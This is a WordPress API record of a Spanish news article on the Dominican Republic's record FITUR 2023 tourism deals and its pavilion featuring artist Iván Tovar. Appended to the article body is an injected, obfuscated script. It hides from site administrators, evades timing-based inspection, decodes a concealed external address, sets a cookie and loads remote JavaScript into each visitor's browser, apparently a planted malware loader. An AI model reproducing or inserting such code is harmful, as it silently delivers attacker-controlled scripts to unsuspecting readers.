{"id":13553,"date":"2023-01-23T12:56:33","date_gmt":"2023-01-23T16:56:33","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13553"},"modified":"2023-01-23T12:56:33","modified_gmt":"2023-01-23T16:56:33","slug":"rd-cierra-fitur-2023-con-su-participacion-mas-exitosa-logra-acuerdos-por-mas-de-usd-3445-millones","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13553","title":{"rendered":"RD cierra FITUR 2023 con su participaci\u00f3n m\u00e1s exitosa; logra acuerdos por m\u00e1s de USD 3,445 millones"},"content":{"rendered":"<p>Madrid, Espa\u00f1a.- Rep\u00fablica Dominicana logr\u00f3 este a\u00f1o\u00a0<strong>sus mayores \u00e9xitos en la historia de su participaci\u00f3n en la feria tur\u00edstica de FITUR<\/strong>, donde tuvo uno de los pabellones m\u00e1s visitados y se lograron acuerdos por m\u00e1s de\u00a0<strong>3,445 millones de d\u00f3lares, de los cuales 1,645 millones se invertir\u00e1n este mismo a\u00f1o.<\/strong><\/p>\n<p><strong>El Ministro de Turismo, David Collado,<\/strong>\u00a0mostr\u00f3 su satisfacci\u00f3n por los logros alcanzados en FITUR, tras asegurar que es\u00a0<em>\u00absin dudas, la m\u00e1s exitosa participaci\u00f3n de Rep\u00fablica Dominicana en esta importante feria tur\u00edstica de Espa\u00f1a y del mundo\u00bb.<\/em><\/p>\n<p><em>\u00abLos logros en FITUR son hechos tangibles: mayor conectividad y acuerdos que representan inversiones\u00bb<\/em>, dijo Collado.<\/p>\n<p>Manifest\u00f3 que gracias a esas inversiones se construir\u00e1n\u00a0<strong>m\u00e1s de 3,000 nuevas habitaciones,<\/strong>\u00a0con lo cual se generar\u00e1n 10,000 empleos de manera directa e indirecta.<\/p>\n<p>Tambi\u00e9n destac\u00f3 los\u00a0<strong>acuerdos<\/strong>\u00a0que se suscribieron con\u00a0<strong>l\u00edneas a\u00e9reas<\/strong>\u00a0y los principales\u00a0<strong>tour operadores de Europa.<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/enterarterd.com\/wp-content\/uploads\/2025\/12\/Stand-RD-en-Fitur-2.jpg\" alt=\"\" width=\"1300\" height=\"731\" data-entity-type=\"file\" data-entity-uuid=\"1ff05f70-9d3c-404c-8805-cc654532f3f2\" \/><\/p>\n<p><strong>El pabell\u00f3n dominicano<\/strong><\/p>\n<p>Desde que inici\u00f3 la feria, el mi\u00e9rcoles 18, el pabell\u00f3n dominicano atrajo la atenci\u00f3n de las personas, ya que les garantizaba vivir una\u00a0<strong>experiencia inmersiva tridimensional en los grandes y diversos atractivos tur\u00edsticos de Rep\u00fablica Dominicana<\/strong>, a m\u00e1s de 8,000 kil\u00f3metros de esa realidad.<\/p>\n<p>En el pabell\u00f3n dominicano qued\u00f3 impregnado el ingenio y el talento de\u00a0<strong>Iv\u00e1n Tovar\u00a0<\/strong>con su \u00abSurrealismo Vivo\u201d.<\/p>\n<p>Tovar, oriundo de San Francisco de Macor\u00eds, es actualmente\u00a0<strong>el artista dominicano m\u00e1s cotizado<\/strong>, tras la venta de su obra \u201cLa Menace\/ La Amenaza\u201d, en la casa de subasta Sotheby\u2019s, por doscientos cincuenta mil d\u00f3lares\u00a0<strong>(USD 250,000)\u00a0<\/strong>en mayo de 2020.<\/p>\n<p>Su obra est\u00e1 caracterizada por formas volum\u00e9tricas y espaciales sobre fondo oscuro, enmarcadas dentro del\u00a0<strong>Surrealismo<\/strong>, estilo que asumi\u00f3 mientras vivi\u00f3 en Par\u00eds y con el cual expuso junto a los grandes representantes de dicho movimiento a nivel internacional.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Madrid, Espa\u00f1a.- Rep\u00fablica Dominicana logr\u00f3 este a\u00f1o\u00a0sus mayores \u00e9xitos en la historia de su participaci\u00f3n en la feria tur\u00edstica de FITUR, donde tuvo uno de los pabellones m\u00e1s visitados y se lograron acuerdos por m\u00e1s de\u00a03,445 millones de d\u00f3lares, de los cuales 1,645 millones se invertir\u00e1n este mismo a\u00f1o. El Ministro de Turismo, David Collado,\u00a0mostr\u00f3 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13555,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13553","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13553","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13553"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13553\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13555"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13553"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13553"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13553"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}